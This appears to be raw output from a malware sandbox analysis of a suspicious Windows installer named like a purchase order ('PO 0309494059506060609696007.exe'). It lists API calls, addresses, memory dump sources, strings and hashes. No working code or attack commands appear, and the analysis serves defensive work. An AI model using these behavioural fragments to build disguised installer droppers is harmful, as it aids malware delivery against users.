                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,Undseeligheds17 Setup,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F$Undseeligheds17 Setup
                                                • API String ID: 941294808-1725128886
                                                • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                  • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                  • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                                • wsprintfA.USER32 ref: 00405F85
                                                • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FCF
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406007
                                                • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040605D
                                                • GlobalFree.KERNEL32(00000000), ref: 0040606E
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406075
                                                  • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\PO 0309494059506060609696007.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                  • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]
                                                • API String ID: 2171350718-461813615
                                                • Opcode ID: 151896fb917cb721a647a276051a8043771a484634d5eaa0db9ba54421dac525
                                                • Instruction ID: 4536b0422d5dde00314373cba87b6dc9e05edcb010d47b65b9eea0f1bfd6f862
                                                • Opcode Fuzzy Hash: 151896fb917cb721a647a276051a8043771a484634d5eaa0db9ba54421dac525
                                                • Instruction Fuzzy Hash: 5A313531641B04BBC220AB659D48F6B3AACEF45744F15003FFA46F62D2DB7C98118ABD
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",0040336A,C:\Users\user\AppData\Local\Temp\,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",0040336A,C:\Users\user\AppData\Local\Temp\,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",0040336A,C:\Users\user\AppData\Local\Temp\,74DF3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: "C:\Users\user\Desktop\PO 0309494059506060609696007.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-2221229530
                                                • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                • Instruction ID: 36fae6fd7d65e337959ab81909abbfc549fe516cf0b4c9ff473ab524d2c4c229
                                                • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                • Instruction Fuzzy Hash: B611B65580061279DB302B14BC40EB762F8EF54764F56403FED86732C8EBBC5C9292AD
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 004042B5
                                                • GetSysColor.USER32(00000000), ref: 004042F3
                                                • SetTextColor.GDI32(?,00000000), ref: 004042FF
                                                • SetBkMode.GDI32(?,?), ref: 0040430B
                                                • GetSysColor.USER32(?), ref: 0040431E
                                                • SetBkColor.GDI32(?,?), ref: 0040432E
                                                • DeleteObject.GDI32(?), ref: 00404348
                                                • CreateBrushIndirect.GDI32(?), ref: 00404352
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                • Instruction ID: a3c6a1d12b74a4a342abaca89036a15a37f51972f1e3113ed1cbee018e9c0b42
                                                • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                • Instruction Fuzzy Hash: 772156716007059BC724DF78D948B5B77F4AF81710B04893DED96A26E0D734E544CB54
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C07
                                                • GetMessagePos.USER32 ref: 00404C0F
                                                • ScreenToClient.USER32(?,?), ref: 00404C29
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C3B
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                • Instruction ID: 457ccdd811883e010b73e4973708530e0d9e00004b69c5e73a61d7a3cd07de8f
                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                • Instruction Fuzzy Hash: CF015271900218BAEB10DBA4DD85BFEBBBCAF95711F10412BBA50B71D0D7B499018BA4
                                                APIs
                                                • GetDC.USER32(?), ref: 00401DBC
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                • CreateFontIndirectW.GDI32(0040CDD0), ref: 00401E3E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID: Calibri
                                                • API String ID: 3808545654-1409258342
                                                • Opcode ID: 7220f7f6e98e794884dde3e45c3c7d189f5b412538bd64b288b51c38544c4e3e
                                                • Instruction ID: ba082d56d8bf6e999078db2812661e05c0675f9cd89887cb5e118dc0f9610a58
                                                • Opcode Fuzzy Hash: 7220f7f6e98e794884dde3e45c3c7d189f5b412538bd64b288b51c38544c4e3e
                                                • Instruction Fuzzy Hash: CF015E71944240EFE700ABB0AF4AAD97FB4AF55301F10457EE242F61E2DAB904458B2D
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6E4221EC,?,00000808), ref: 6E421635
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6E4221EC,?,00000808), ref: 6E42163C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6E4221EC,?,00000808), ref: 6E421650
                                                • GetProcAddress.KERNEL32(!Bn,00000000), ref: 6E421657
                                                • GlobalFree.KERNEL32(00000000), ref: 6E421660
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2313961688.000000006E421000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E420000, based on PE: true
                                                • Associated: 00000000.00000002.2313936159.000000006E420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2313981846.000000006E424000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2314004902.000000006E426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6e420000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID: !Bn
                                                • API String ID: 1148316912-2056604793
                                                • Opcode ID: 1eb6a850a06f16f7d3cb0e6dc9df6d633e447e755e62d5de59ac4cc8130d55b9
                                                • Instruction ID: 429a9cf3b99ac7fe11808ea0dccdb6ea4f2c0decc034cb3b8325fdc8ffd93933
                                                • Opcode Fuzzy Hash: 1eb6a850a06f16f7d3cb0e6dc9df6d633e447e755e62d5de59ac4cc8130d55b9
                                                • Instruction Fuzzy Hash: 35F01C722065387FDA202AB69D4CC9BBE9CDF8B2F5B110211F6289219086614C42D7F1
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                • MulDiv.KERNEL32(000C4EFF,00000064,000C5DA8), ref: 00402E3C
                                                • wsprintfW.USER32 ref: 00402E4C
                                                • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                Strings
                                                • verifying installer: %d%%, xrefs: 00402E46
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                • Instruction ID: 97abdd23f95b89fa957f28f44bfdcbbe1494948371ff671501e6f707f2390605
                                                • Opcode Fuzzy Hash: e1d542de2cd716b5e5aca43617af61348071ba80885408b45aa8db9304e84829
                                                • Instruction Fuzzy Hash: B7014F7164020CBBEF209F60DE49FAA3B69AB04304F008439FA06B91E0DBB885558B98
                                                APIs
                                                  • Part of subcall function 6E42121B: GlobalAlloc.KERNELBASE(00000040,?,6E42123B,?,6E4212DF,00000019,6E4211BE,-000000A0), ref: 6E421225
                                                • GlobalFree.KERNEL32(?), ref: 6E422657
                                                • GlobalFree.KERNEL32(00000000), ref: 6E42268C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2313961688.000000006E421000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E420000, based on PE: true
                                                • Associated: 00000000.00000002.2313936159.000000006E420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2313981846.000000006E424000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2314004902.000000006E426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6e420000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: b83bca3d4a8cd72a229f95349470e1144b6a24a95f5a03a91ed875c41f0a7b1e
                                                • Instruction ID: 254fadb246ca8b10dd922a256ef75859dadbcd8f7096a2f691423d6b9e44901f
                                                • Opcode Fuzzy Hash: b83bca3d4a8cd72a229f95349470e1144b6a24a95f5a03a91ed875c41f0a7b1e
                                                • Instruction Fuzzy Hash: 5731CF32124501DFCB249FF4ED94C6A7BBAFBC6344310457EF5419B264CB319896CB6A
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                • GlobalFree.KERNEL32(?), ref: 00402956
                                                • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                • Instruction ID: 46c72067781f24dbae578634f425dbba750e376c3d5c902d6f733973cd64d3bf
                                                • Opcode Fuzzy Hash: 4126a60767291b4e97372a1dfb43fb75c9546f442d683c376cf2255872b84c40
                                                • Instruction Fuzzy Hash: 9621AEB1800128BBDF116FA5DE89DDE7E79AF08364F14423AF960762E0CB794C418B98
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nst14AC.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nst14AC.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
